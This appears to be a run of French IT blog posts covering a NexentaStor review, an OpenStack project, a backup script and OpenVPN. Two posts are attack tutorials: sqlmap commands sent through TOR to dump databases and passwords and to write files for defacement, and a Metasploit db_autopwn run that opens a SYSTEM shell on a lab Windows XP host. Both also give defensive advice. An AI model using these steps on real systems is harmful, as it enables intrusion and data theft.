Toujours dans mon projet de formation sur OpenStack, j’ai décidé de me concentrer sur la partie stockage d’une infrastructure.
 
 
 
Je recherchais une solution qui répondait à ces critères :

• Environnement Open-Source
• Respect des standards
• Compatibilité avec les IaaS du marché (on verra plus tard que j’ai testé VMware & OpenStack)
• Bien documenté, et si possible un forum bien actif

J’ai donc choisis de tester NexentaStore Enterprise Edition dans sa version d’essai.

Ce que j’ai eu en plus avec Nexenta :

• Une interface d’administration & de configuration user-friendly (Web-GUI)
• Une liste très impressionnante de plugins (gratuits & payants) qui apportent des fonctionnalités non-négligeables
• La chance de pouvoir tester NexentaStor Enterprise Edition gratuitement pendant 45 jours.
• L’immense chance de pouvoir tester le plugin « HA Cluster » (que nous verrons plus tard) pendant 45 jours également (merci à l’équipe de Nexenta de m’avoir aidé).

Qu’est-ce que l’Open-Storage ?

Pour résumer l’Open-Storage avec des mots simples :
Fournir du stockage de manière standard, provenant de différentes sources, propriétaires ou libres. C’est donc s’affranchir du matériel propriétaire et hétérogène, pour rationaliser ses ressources en stockage.
L’Open-Storage est donc une solution économique de se créer une baie de disque hautement disponible et tolérante aux pannes, à partir de différentes sources de stockage.
En résumé, voici 3 avantages liés à l’Open-Storage :

• Votre stockage devient ouvert et accessible, grâce aux standards de l’industrie du stockage.
• Vous dessinez vous-même votre architecture de stockage. Il n’y a donc aucune limite à votre infrastructure !
• Votre Hardware devient flexible, dans la mesure où tout changement devient transparent pour l’utilisateur final.

Cas concret :

Je dispose actuellement d’une baie de stockage EMC, avec des disques plutôt performants en lecture / écriture. A coté de ça, j’ai récupéré une baie de disques SSD (très rapides donc), et enfin une baie assez ancienne comprenant des vieux disques toujours opérationnels.

Dans mon réseau, je souhaite fournir du stockage :

• assez performant pour mes serveurs ESXi pour le stockage des machines virtuelles.
• plutôt rapide pour mon infrastructure VDI, fournie par VMware View
• lent, mais facilement extensible pour du Cloud storage (exemple : Dropbox, Ubuntu One, SkyDrive, etc).

Ce que fait NexentaStore :

Pour commencer les présentations, il est bon de rappeler les bases.

NexentaStor est une appliance, basée sur OpenSolaris. Étant payante, j’ai donc usé de la licence Trial qui m’a permis de tester le produit dans sa totalité pendant 45 jours.

Il existe une version gratuite, NexentaStor Community Edition qui permet de fournir jusqu’à 18To de stockage (Raw). Attention, je n’évoquerai pas ce produit dans cet article car il ne supporte pas l’ajout des plugins type « HA Cluster » & autre.

Pour voir la liste complète des fonctionnalités, vous pouvez directement le lire sur le site officiel. Cependant, voici les points intéressants de ce produit :

• Système de fichiers ZFS 128 bits
• Aucune limite de stockage (ni eu capacité de stockage, ni en taille de fichier)
• Compatible SAN (iSCSI & FC) & NAS (NFS, CIFS, WebDAV et FTP)
• Optimisation du stockage (compression, dé-duplication)
• Création de Pools de stockage (pour améliorer les performances)
• Snapshots à chaud
• Réplication synchrone et asynchrone (pour faciliter le Disaster Recovery)
• Intégrité des données
• De nombreux plugins très puissants (je reviendrai plus tard vers le plugin HA Cluster)
• Et enfin, ce que j’ai vraiment apprécié : intégration avec VMware, Xen, OpenStack et Hyper-V.

Avec NexentaStor, je vais être capable de rationaliser le stockage que j’ai à ma disposition, de le rendre hautement disponible et tolérant aux pannes, et enfin de le distribuer vers des hôtes à travers des protocoles standards et connus de tous.

Mon infrastructure

Des fois, un bon vieux dessin vaut mieux qu’un gros pavé. Donc j’ai pris Visio pour vous montrer mon architecture :

• Je dispose d’une baie EMC avec des disques dur SAS en RAID 5, ainsi qu’une autre baie avec des disques SSD.
• Mes 2 appliances sont virtualisées dans mon infrastructure VMware, et sont en cluster avec le plugin HA.
• Je fournis du stockage pour les clients légers (VDI), mes VMs & volumes (pour OpenStack), et pour du Cloud Storage.

Ce que j’ai testé :

Dans un premier temps, j’ai testé :

• les fonctionnalités de base : Mapping de volumes over iSCSI, partage de fichier CIFS (dans un domaine 2008 R2 Natif), et NFS.
• Ensuite, j’ai fait la demande au service commercial de Nexenta pour tester gratuitement le plugin HA Cluster (qui coûte 4900 $). Il m’a permis de rendre hautement disponible le stockage que je met à disposition sur on réseau.

Je vais m’attarder sur ce plugin car je l’ai trouvé particulièrement puissant :

• L’installation se fait assez aisément, mais il faut au préalable avoir lu la documentation officielle (comme d’hab, RTFM !!!), sinon vous aurez des erreurs.
• J’ai été agréablement surpris. Tout a fonctionné du 1er coup : l’installation du plugin, la configuration de la mise en cluster des 2 appliances, la création des volumes à partager, et la configuration dans VMware ESX (la configuration du Multipath se fait toute seule).
• J’ai testé le basculement vers le serveur secondaire en mode Failover automatique et l’interruption de service était de 8 secondes (le temps pour l’IP Failover de switcher vers l’autre serveur). J’ai vraiment aimé le principe de pouvoir utiliser les cartes réseaux en Failover et continuer à fournir le stockage depuis le serveur principal. Si c’est le serveur en entier qui n’est pas accessible, l’autre prendra le relais et le service ne sera pas stoppé.

Voici une capture d’écran du dashboard du plugin HA Cluster (Cliquez-sur l’image pour agrandir) :

Par rapport à ce plugin, je dirais qu’il va à l’essentiel : il fonctionne et permet réellement de faire de la HA au niveau storage.

• Autre plugin très intéressant : VMDC (Virtual Machines Datastore Center). Il permet de gérer les datastores d’un hyperviseur directement depuis l’IHM de NexentaStor. Il est compatible avec VMware, Xen et Hyper-V. Suivant l’API de l’hyperviseur, certaines fonctionnalités sont disponibles en plus, comme l’arrêt ou le redémarrage des VMs.

• Je garde le meilleur pour la fin… le plugin OpenStack, qui permet d’intégrer du stockage fournis par NexentaStor dans une infrastructure OpenStack, et plus particulièrement pour le service nova-volumes (qui fournit des block devices aux VMs). De base, le driver est capable de créer des volumes, de les supprimer, et de réaliser des snapshots, et tout ça grâce aux REST API. Je rajouterai encore quelque chose de très pertinent : la distribution StackOps intègre nativement le driver NexentaVolumeDriver, et permet dès le SmartInstaller d’indiquer où se trouve le serveur NexentaStor.

Ce que j’en pense :

Vous l’aurez compris… que du bien !

Non, plus sérieusement. NexentaStor est un produit de qualité, et je pense qu’en s’ouvrant aux différentes technologies, il s’offre un bel avenir devant lui, et continuera de séduire tous ceux qui ne peuvent pas s’offrir des baies de stockages propriétaires. Ce que j’ai vraiment aimé, c’est la compatibilité avec les différents protocoles de transport de fichiers (NFS, CIFS, FTP, WebDAV) et également les technologies SAN (iSCSI & FC). De plus, ses plugins font de NexentaStor une solution flexible, et ouverte à un environnement hétérogène. Peu importe votre matériel et vos outils déjà en place : il sait s’adapter, et offrir ce qu’il sait faire de mieux : du stockage hautement disponible.

Les alternatives :

Il existe plusieurs alternatives, mais j’en ai testé une Open-Source, et une propriétaire.

Il s’agit de FreeNAS, et de Datacore SAN-Symphony-V.

• Concernant FreeNAS, ses fonctionnalités ne sont pas aussi poussées que les produits de Nexenta.
• Pour SAN-Symphony-V de Datacore, j’ai eu la chance d’avoir un cours sur le produit, ainsi qu’un TP à l’université. Je dois dire que le software est impressionnant, et qu’il fournit du stockage de manière performante et hautement disponible grâce à la mise en cluster. Il ne manquerait plus qu’une interopérabilité avec d’autres acteurs du  Cloud comme le fait Nexenta avec ses plugins vus précédemment, ainsi qu’une REST-API (le seul moyen d’administrer le stockage sous SSV étant le Powershell ou la GUI en dotnet depuis Windows). J’ai eu l’occasion de créer du stockage à partir de SAN-Symphony pour OpenStack nova-volumes, mais je n’ai pas fait de benchmark pour le comparer avec le produit Nexenta.

Si des gurus du Cloud lisent cet article, n’hésitez pas à laisser votre commentaire !
 
Je vous laisse, je retourne dans mes nuages

Cela fait plusieurs semaines que je travaille sur un projet de Cloud Open-Source, de type IaaS (Infrastructure As A Service). Je dois dire que c’est un projet très intéressant et surtout prometteur dans un monde où VMware a tendance à écraser le marché. Je trouve génial de pouvoir disposer d’outils libres et gratuits pour comprendre la virtualisation.

Dans cet article, je vais vous présenter mon projet, et je vous publie aussi le résultat de mon travail (un Powerpoint d’une cinquantaine de slides qui résume mon étude).

Mise en situation

Concrètement, il m’a été demandé par mon directeur de formation d’installer un service de Cloud Computing Open-Source (avec OpenStack) qui fournirait un catalogue d’images (Ubuntu Server, Windows 2008 R2, etc) et managable depuis un navigateur Web. Plus concrètement, voici un descriptif du processus :

• Le client se connecte via un navigateur Web sur un Dashboard
• En fonction de son profil, il a le droit ou non de créer des machines virtuelles, de créer des images, des snapshots, de gérer son réseau, etc.
• Le client crée une machine virtuelle (exemple : Ubuntu Server) à partir d’un template, et lui attribue une adresse IP publique.
• Il peut accéder à sa VM via SSH et a un accès root au système.
• La machine peut être rebootée, et éteinte.
• Le client peut consulter ce qu’il a consommé et voir combien il paiera en fin de mois pour son usage.

Plusieurs points sont intéressants, c’est tout d’abord le dashboard. Accessible depuis Internet, le client s’authentifie de manière sécurisée et effectue toutes ses tâches nécessaires. Secundo, le principe de facturation est super intéressant pour une entreprise qui facture à son client en fonction de son utilisation. Enfin, outre le fait que tout les outils sont libres et gratuits, ils sont très compatibles avec les API des autres systèmes (ex : Xen, VMware, etc).

Mon étude

Je ne vais pas rentrer dans les détails ici, mais plutôt vous donner le lien de téléchargement de mon fichier PDF que j’ai réalisé pour ma présentation.

Voici un aperçu avec Google Doc (il manque des visuels) :

Download (PDF, 1.09MB)

Dans quelques semaines, je recommence à travailler sur ce projet, et je vais me concentrer sur le nouveau Dashboard (Diablo) qui permet de faire plus de trucs que le module Cloud de Drupal. J’aimerais aussi me pencher sur la compatibilité avec les autres hyperviseurs, notamment les proprio (ça m’intrigue !). Enfin, je compte me perfectionner sur la haute disponibilité pour prétendre avoir un Cloud Open-Source performant, disponible, et compatible !

La suite bientôt…
PS : Le document fourni est 100% libre de droit, mais en cas de réutilisation, merci de me prévenir . Je suis également adepte au remarques et critiques, donc n’hésitez pas !

Je ne peux pas parler de ce sujet sans aborder les injections SQL. Toutefois, la lecture de ces quelques lignes requiert certaines connaissances en base de données SQL. Je ne ferai aucun rappel sur ce langage.

Voici le plan de cet article :

• Définition
• Exploitation
• Impact
• Se protéger

Bien entendu, cet article a pour vocation d’expliquer comment les hackers font, et comment se protéger des attaques de ce type.

• Définition

Une injection SQL est une méthode d’exploitation d’une faille de sécurité liée à une base de données. Elle consiste via une application utilisant une base de données SQL à injecter une requête qui permettrait d’obtenir beaucoup d’informations allant de la version du serveur jusqu’à la base de données complète. Nous allons voir dans la partie « Impact » ce qui est exploitable également.

Techniquement, une injection SQL via un site web consiste à exploiter une variable non protégée appelée via une URL.

Voici un bref exemple : « http://www.target.com/photos.php?id=1 »

Cette URL affiche par défaut la page d’identifiant 1 par rapport à la base de données.
En fin de compte, cette URL pourrait ressembler à cette requête SQL :

SELECT *
FROM photos
WHERE 'id_photos = 1' ;

Cette requête pourtant simple permet toutefois beaucoup de choses si le code PHP a été mal programmé. Nous y reviendrons plus tard.

• Exploitation

La meilleure explication est l’exemple.

Le hacker va tout d’abord chercher sa victime en fouillant le site Internet cible. Il pourra notamment s’aider de Google.

Par exemple, il va rechercher sur Google tous les « gallery.php » utilisant des ID :
inurl:gallery.php?id=

Dans la plupart des cas, les sites Web sont faits à l’aide de CMS, ou alors codés entièrement à la main. Mais il arrive que ces CMS ne soit pas à jour, ou alors que le développeur web n’est pas pris soin de protéger les variables utilisées par les URL.

Lorsque le hacker va tomber sur une page de ce style, il va remplacer le 1 par un -53 par exemple, de manière à provoquer une erreur.

Si le message suivant apparaît, vous pouvez être sûrs qu’une injection SQL est possible :

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/users/site/html/gallery.php on line 248

En fait, j’irai même plus loin en disant que si http://www.target.com/photos.php?id=1 affiche la même chose que http://www.target.com/photos.php?id=1+AND+1=1 ou/et que http://www.target.com/photos.php?id=1+AND+1=2 diffère de la 1ère page, il y a vulnérabilité.

Avec la distribution Backtrack, voyons maintenant ce que l’on peut faire. L’excellent outil « SQLmap » nous permettra de réaliser tous les tests nécessaire pour une injection SQL.

Je vais vous montrer quelques commandes (je n’invente rien, j’ai juste lu la doc ).

Note : Dans toutes mes commandes, j’utilise TOR pour rester anonyme, ainsi qu’un générateur d’USER-AGENT pour que le serveur web distant ne détecte pas de requêtes HTTP provenant d’un certain « SQLmap ».

Pour exécuter ces commandes, il faut avant se rendre dans le répertoire /pentest/database/sqlmap. Il faut également remplacer quand c’est le cas dans mes commandes $url par l’URL du site, $db par le nom de la base de données, $table par le nom de la table, $column par le nom de la colonne et $sql par la requête SQL voulue.

Auditer si l’URL est vulnérable :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent

Si le site est vulnérable, il vous le dira explicitement.

C’est le cas pour notre exemple, passons à la suite.

Lister les privilèges SQL avec l’injection SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –privileges

Lister les bases de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dbs

Indiquer le nom de la base de données où l’injection SQL se fait :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –current-db

Montrer les mots de passe d’accès à la base de données :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –passwords

Lister les tables sur 5 threads (plus rapide) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –tables -D $db –threads= »5″

Lister les colonnes :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –columns -D $bdd -T $tables

Dumper le contenu d’une table :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –dump -D $db -T $table –threads= »5″

Exécuter une requête SQL :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –sql-query= »$sql » -D $db

Si vraiment le serveur est mal configuré, il est aussi possible d’écrire un fichier (utilisé lors de defacements) :
python sqlmap.py -u $url -v 1 –proxy=http://localhost:8118 –random-agent –file-write=$file –file-dest /var/www/public_html/

SQLmap s’utilise aussi avec Metasploit :

$ msfconsole
 
                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##
 
msf > use auxiliary/scanner/http/sqlmap
msf auxiliary(sqlmap) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(sqlmap) > run

Vous l’aurez compris, cet outil est hyper puissant, d’ailleurs j’insiste sur le fait que pour obtenir de meilleurs résultats, il est important de le mettre à jour régulièrement avec l’option –update.

• Impact

Quel impact d’une telle attaque ?
La liste peut être longue, mais je vais faire court :

- compromission d’une partie ou d’une entière base de données, qui peut contenir des informations précieuses : logins, mots de passe, e-mails, coordonnées bancaires, etc.
- compromission d’autres bases de données quand un seul utilisateur existe pour 150 bases de données (sisi je vous jure, ça existe).
- compromission des données du serveur Web (on a vu qu’on pouvait dans certains cas écrire sur le serveur).

• Se protéger

Il existe à chaque niveau des moyens pour se protéger contre les injections SQL.

Je vais partir des couches basses pour remonter peu à peu :

- Installer un équipement de détection d’intrusion de type IDS et mettre régulièrement à jour la base de données qui contient les « exploits » connus.
- Installer un SGBDR connu, et le mettre à jour très régulièrement. Par exemple, MySQL est très performant, mais nécessite toutefois d’être mis-à-jour souvent.
- Utiliser au mieux toutes les fonctionnalités des bases de données : pour chaque site par exemple, créer sa base de données, son utilisateur SQL, avec un minimum de droits. Bien entendu, le concept d’un seul utilisateur avec tous les droits partout est à proscrire !!!
- Utiliser un serveur Web reconnu et le mettre à jour souvent. Apache est très bien reconnu dans le domaine.
- Enfin, il est plus qu’obligatoire de protéger toutes les variables utilisées.

Exemple : $id = mysql_real_escape_string($_POST['id']);

Dans ce domaine, voici un lien très intéressant. Si vous n’y connaissez rien, utiliser un CMS bien reconnu, et mettez-le à jour dès que possible ! (WordPress par exemple)

En résumé : utiliser des outils connus et les mettre à jour régulièrement.

En conclusion, SQL est un langage surpuissant, qui demande beaucoup de connaissances. Négliger la sécurité dans les couches hautes, peut compromettre tout le reste. Imaginer le pire : intrusion sur un serveur web via injection SQL, accès à d’autres serveurs via une connexion de pont, dump de toutes les bases de données, defacement de sites web…

Aujourd’hui, les injections SQL sont les vulnérabilités les plus utilisées sur le Web.
A bon entendeur…

L’exploitation de faille est un moment excitant. Toutes les recherches engagées vont normalement porter ses fruits. Nous allons enfin explorer les faiblesses d’un réseau ou d’un système.
Suivant les vulnérabilités, il y a des tonnes de possibilités en matière d’exploitation. Si vous voulez en savoir plus, faites comme moi et achetez un bon bouquin relatant des techniques de Hacking. Vous comprendrez mieux quelles sont les différentes méthodes pour exploiter une faille, ainsi que les différents types de failles.

Comme il existe beaucoup de types de failles, et énormément de méthodes, je m’arrêterai sur un cas général, en appliquant une technique « classique ».

Après avoir collecté un tas d’informations sur le réseau, ainsi que sur la machine ciblée, nous avons évaluer ses vulnérabilités. Rappelez-vous de notre bon ami Nessus qui nous a clairement indiqué que la machine cible avait comme système d’exploitation Windows XP SP3, et proposait le service de système de fichiers réseau CIFS. Seulement voilà, cette machine est vulnérable. Non pas parce qu’elle utilise ce service, mais parce que l’administrateur de la machine n’a pas pris le temps de mettre à jour régulièrement son système d’exploitation via Windows Update, ainsi que l’antivirus

Sachez que les tests réalisés en réseau local ont été effectué avec l’antivirus Avira Antivir (ainsi qu’une base de données antivirale de moins d’un an), sur un Windows XP SP3 sans mises à jour récentes.

Vous serez surpris de voir qu’il existe énormément d’ordinateurs au monde dans ce cas là. Ils sont souvent la proie des virus sur Internet (qui aident notamment à réaliser des attaques DDoS (Distributed Denial of Service).

Dans notre étude de cas, nous allons utiliser Metasploit Framework (MSF).

Sa base de données contient tous les exploits / payloads connus à ce jour. Bien entendu, pour une bonne utilisation de cet outil, il est important de le mettre à jour régulièrement (voir même avant chaque utilisation) avec la commande « msfupdate« .

Dans un terminal, démarrez l’outil « msfconsole« .

root@root:~# msfconsole
 
_
| |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
 
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 
msf >

Nous allons utiliser le résultat du scan Nessus exécuté dans dans la recherche de vulnérabilité (dernier article), et l’importer dans une base de données SQL :

msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.129
[*] Successfully imported /root/nessus_report_Win.nessus
msf > db_import /root/nessus_report_Win.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.128.132
[*] Successfully imported /root/nessus_report_Win.nessus

MSF connaît maintenant votre victime : comment la joindre, et surtout quelles sont les vulnérabilités trouvées par Nessus.

Nous allons lancer une commande qui va automatiquement exploiter l’un des failles disponibles afin d’obtenir une session avec la machine distante. Admirez le travail :

msf > db_autopwn -x -e
[*] (1/3 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.128.132:445...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.128.132:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.128.138:48400 -> 192.168.128.132:6313) at 2011-09-05 09:40:24 -0400
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...

0wned ! Le tour est joué, la machine distante est prise au piège. Nous avons utiliser l’exploit ms08_067_netapi pour pénétrer le système.
Pour retrouver une session ouverte, il suffit d’exécuter cette commande :

msf > sessions -l
 
Active sessions
===============
 
  Id  Type                   Information                           Connection
  --  ----                   -----------                           ----------
  1   meterpreter x86/win32  AUTORITE NT\SYSTEM @ VICTIME-484AF1D  192.168.128.138:48400 -> 192.168.128.132:6313

Et maintenant ?

Maintenant passons aux vilaines choses.
Pour obtenir le shell d’une session ouverte, il suffit de l’appeler par son ID :

session -i 1

Ensuite, la commande « help » vous éclairera sur la suite. Vous pouvez par exemple explorer les fichiers, prendre une capture d’écran, enregistrer les touches du clavier utilisées et encore plein d’autres trucs, dont des tâches administratives.

Cependant, un hacker ayant obtenu le shell d’un système essaye dans la plupart des cas de rester discret.
Dans le prochain article, nous allons voir comment installer un « backdoor » afin de pouvoir revenir plus tard sur le système sans exploiter de faille.
Ah oui, j’oubliais. Backtrack fournit une excellente interface graphique à MSF : « Armitage« .

Par rapport aux autres articles, aucune nouveauté en matière de lutte contre ce genre d’attaque. Un antivirus à jour, un pare-feu bien configuré, un système d’exploitation récent et à jour suffiront à éviter ce genre d’exploitation.

Aujourd’hui, les systèmes les plus vulnérables sont les sites Web qui sont très souvent victimes d’injections SQL permettant de récupérer des fichiers importants, et de compromettre la sécurité du serveur, et donc du réseau tout entier.

Nous continuons la série d’articles consacrés à Backtrack.

Rappelons en quelques mots les objectifs de ces quelques articles. Après avoir testé la distribution pendant quelques semaines, j’ai jugé sympa de partager quelques ressources. Chaque première partie d’un article permet de comprendre comment les pirates informatiques font pour pénétrer un système et pour obtenir des informations précieuses. La deuxième partie quant à elle explique comment éviter ce genre d’attaque, et donnes quelques indications sur la manière de protéger un réseau et un système.

Nous avons vu ensemble comment se déroulait la 1ère étape : la collecte d’informations.

Clairement, cette partie nous a fait comprendre comment identifier la cible :

• Son matériel (si possible)
• Son système d’exploitation (et si possible sa version)
• Ses services (si possible avec leur version)
• Pour les applications Web : leur langage de programmation
• Pour les bases de données : leur système de gestion de base de données

Ces informations recueillies ne sont pas perdues, bien au contraire. Nous allons maintenant les passer en revue pour détecter la moindre faille qui pourrait être exploitable par la suite.

Les moyens engagés pour détecter les vulnérabilités

• Scanner de vulnérabilité

- Nessus : Nous l’avions dit dans l’introduction consacrée à la distribution Backtrack, il est  incontournable dans le monde de la sécurité.

Avant toute chose, il est nécessaire d’obtenir une clé de licence (gratuite). Une fois reçue dans votre boite mail, exécutez la commande suivante :

sudo /opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
sudo /opt/nessus/bin/nessus-fetch --security-center

Il faut maintenant créer un utilisateur interne au logiciel avec lequel vous vous loguerez pour faire des audits :

sudo /opt/nessus/sbin/nessus-adduser

Une fois configuré, mettez les plugins à jour avec la commande

nessus-update-plugins

Nous pouvons maintenant accéder au logiciel depuis un navigateur web à l’URL : http://localhost:8834

Renseignez le login / mot de passe configuré deux étapes plus haut. Vous avez un menu supérieur qui vous permet de gérer les utilisateurs, les politiques d’audit, les audits, et les rapports d’audit.

Dans un scénario classique, nous pouvons démarrer un audit directement en utilisant une politique par défaut. Dans mon scénario, nous avions détecté que la victime était un ordinateur disposant du système d’exploitation Windows XP SP3, ainsi que le partage de fichier activé. Créer un nouveau « Scan« , puis choisissez une des politiques par défaut (pour mon test, je choisis « Internal Network Scan« ). Je n’oublie pas de préciser l’adresse IP de la cible dans « Scan Targets« . Je clique sur « Launch scan« , et j’attends. Pour suivre en temps réel l’audit, rendez-vous dans le menu « Reports« . Cliquez deux fois sur le scan en cours, et découvrez les informations récoltées, avec leurs précisions.

Une fois le test terminé, les failles sont classées par importance. Sachez que si vous trouvez des failles dans la colonne « High« , il est certain que votre système est hautement vulnérable et facilement accessible depuis l’extérieur.

Dans notre étude de cas, nous avons découvert les vulnérabilités concernant le serveur SMB. Dans le prochain article, nous tenterons d’exploiter ces failles afin d’obtenir un shell sur l’ordinateur cible. En attendant, n’oubliez pas que ces informations sont précieuses et qu’il faut absolument les sauvegarder. Cliquez sur « Download Report » en bas à gauche. Choisissez le format par défaut et placer votre fichier en lieu sûr (dans Dradis par exemple).

Nous l’avons vu, Nessus est rapide et efficace. Il est important de mettre à jour régulièrement les plugins pour trouver les failles les plus récentes. Il est capable de nous donner énormément d’informations concernant la configuration d’un service distant. Nous le verrons un peu plus loin, c’est l’outil indispensable pour auditer soi-même nos propres systèmes.

- Mantra : Navigateur Web basé sur Firefox contenant un large panel de plugins utiles pour l’audit d’applications Web. En quelques clics, explorer les failles XSS, ou tentez des iSQL directement sur des pages Web. Les XSS sont relativement fréquentes sur Internet, surtout dans les formulaires où les développeurs Web ne prennent pas toujours le temps de sécuriser leur production.

• Évaluation du réseau

Nous avons vu deux outils généralistes pour scanner un réseau ou une application web. Voyons maintenant quelques outils plus spécialisés.

- Cisco Tools : Contient des scripts pour auditer des équipement actifs de marque Cisco. Certains outils sont capables de détecter la version de l’IOS d’un équipement distant, et donc de connaître ses vulnérabilités.

- Network Fuzzing : Injecte des données aléatoire sur un réseau. « Bed » est un outil puissant qui permet de détecter si un service peut être victime de Buffer Overflow (dépassement de mémoire tampon). Le logiciel « sfuzzer » est également un outil qui permet de tester un  logiciel.

- Rapports de vulnérabilité en ligne : Consultez OSVDB et CVE pour connaître les dernières failles en date.

- VOIP Fuzzing : Détecter les failles d’un réseaux VOIP avec la technique de fuzzing avec le logiciel « voiper » par exemple.

• Évaluation d’applications Web

Les réseaux ne sont pas les seuls vulnérables. Plus haut dans les couches du modèle OSI, les applications Web peuvent être une véritable porte d’entrée vers un système ou vers des informations compromettantes.

- Outils dédiés aux CMS : « Joomscan » est tout simplement l’outil de référence qui permet de détecter des failles dans un site web fait avec le CMS Joomla. L’outil est assez puissant, mais la mise à jour du logiciel ne fonctionne pas (la base de données des failles étant de 2009). « Plecost » est quant à lui dédié au CMS WordPress. Pensez à récupérer la dernière version du fichier texte qui contient les numéros de version des plugins WordPress.

- Webshag est un webfuzzer très simple d’utilisation, car il est disponible en interface graphique. L’outil Webslayer est également très puissant. Ces deux logiciels retenus permettent d’interroger violemment une page web afin d’en ressortir un maximum d’informations (nom des variables, e-mails, méthodes des formulaires, etc.)

- MetaGooFil est un script très pratique pour rechercher rapidement tous les fichiers disponibles triés par extensions  (exemple tous les PDF) sur un site web. Il n’est pas rare de trouver des fichiers texte contenant directement des adresses e-mail ou des mot de passe en clair. Le principal atout de ce logiciel est bien entendu l’extraction de méta-données. En effets, elle peuvent contenir les noms et prénoms des auteurs des fichiers, leurs logiciels et leurs versions, etc. Une mine d’or pour recueillir des informations sur la victime.

- W3af est l’outil Open-Source de référence pour auditer un site Web. Plusieurs plugins sont disponibles : bruteforce, audit, etc. Le résultat du scan nous indique les vulnérabilités présentes sur le site en question. J’ai trouvé ce site qui est un Wiki de W3af (et qui regorge d’informations essentielles).

• Évaluation de bases de données

Les outils d’évaluation de vulnérabilités de base de données sont les mêmes que ceux pour la collecte d’information :

- SQLmap et SQLninja : outils d’injection SQL

- SQLbrute : outil d’injection SQL en bruteforce.

Nous étudierons plus en détail ces outils dans l’exploitation de failles (prochain article).

Les moyens pour lutter contre la détection de vulnérabilités.

Je pense que ce sont les mêmes que pour la collecte d’information.

En effet, la détection de vulnérabilités est également une action de recherche d’informations, mais plus orientée dans la découverte des versions utilisées, ou dans les méthodes appliquées de développement.

Je clos cet article en précisant que la 1ère vulnérabilité est l’Homme. Sécuriser un réseau et un système est une action fondamentale, qui doit toujours rester à l’esprit du personnel informatique. Cependant, la formation du personnel de toute l’entreprise est également primordiale. Les grandes attaques très connues ont toutes commencées par une faille qui venait d’un ou plusieurs employés.

A bon entendeur,

La suite au prochain article : Exploitation.

Hop, c’est cadeau, voici un script tout simple pour sauvegarder automatiquement et périodiquement son site web :

• sauvegarde périodique (les fichiers sont conservés 15 jours)
• sauvegarde des bases de données (variables à changer)
• sauvegarde des fichiers du site (chemins à changer)

Ce n’est qu’un squelette, et vous êtes libres d’y ajouter votre grain de sel, n’hésitez pas à l’améliorer et à le partager ici !

#!/bin/sh
 
#définitions des variables :
datedujour=$(date +%Y%m%d)
fichierdujour=$(date +%Y%m%d)-SqlBackup.tar.gz
datequinze=$(date -d '15 days ago' +%Y%m%d)
 
# On afficher les infos date du jour et autre pour le log.
echo "Date du jour : $datedujour"
echo "Fichier du jour : $fichierdujour"
echo "Date il y a 15 jours : $datequinze"
 
#On supprime  toutes les sauvegardes existantes dans le dossier d'exécution
rm -f *.sql
 
# La commande dump :
mysqldump -h localhost -u LOGIN_BDD -pPASSWORD NOM_BDD > BDD.sql
 
#on archive tous les backups dans un zip a la date du jour
# tar czf $fichierdujour *.sql
 
#on sauvegarde les fichiers du repertoire web
tar -cvzf www.tgz /public_html/
 
#on cree le répertoire du jour et y place les backups
mkdir ~/backup/auto/$datedujour
mv *.sql  ~/backup/auto/$datedujour/
mv www* ~/backup/auto/$datedujour/
 
#on supprime le répertoire d il y a 15 jours s'il existe
if test -d ~/backup/auto/$datequinze; then
echo 'suppression des anciens backups vieux de 15 jours ou plus'
rm -rf ~/backup/auto/$datequinze
fi
 
#on supprime le tar.gz du jour
rm -f $fichierdujour

Puis exécuter :

crontab -e

Pour y ajouter la cron suivante :

0 0 * * * /root/scripts/backup.sh

Je peux maintenant dormir tranquille, cron s’occupe de tout…

Pour quoi faire : Mise en réseau de sites distants

Matériel minimum : Un serveur sous Debian GNU Linux, et un client sous Linux ou Windows ou MAC.

But : Mettre en place un moyen sécurisé et efficace qui permet d’interconnecter une machine distante dans un Intranet, avec le minimum de moyens possible.

Solution retenue : OpenVPN

Détail du travail : Configurer le PKI OpenSSL, configurer le serveur OpenVPN , puis configurer les clients.

Architecture réseau obtenue :

• Présentation d’OpenVPN

OpenVPN est une solution libre permettant de créer un réseau privé virtuel communément appelé VPN (Virtual Private Network), sur le protocole SSL (Secure Socket Layer).

L’avantage principal d’OpenVPN est de pouvoir interconnecter plusieurs réseaux (ou plusieurs ordinateurs distants) entre eux via une technique de « tunnel », et cela de manière sécurisée à l’aide du protocole SSL. Il existe deux modes de fonctionnement d’OpenVPN :

• le mode « bridge », qui permet d’interconnecter plusieurs réseaux distants.

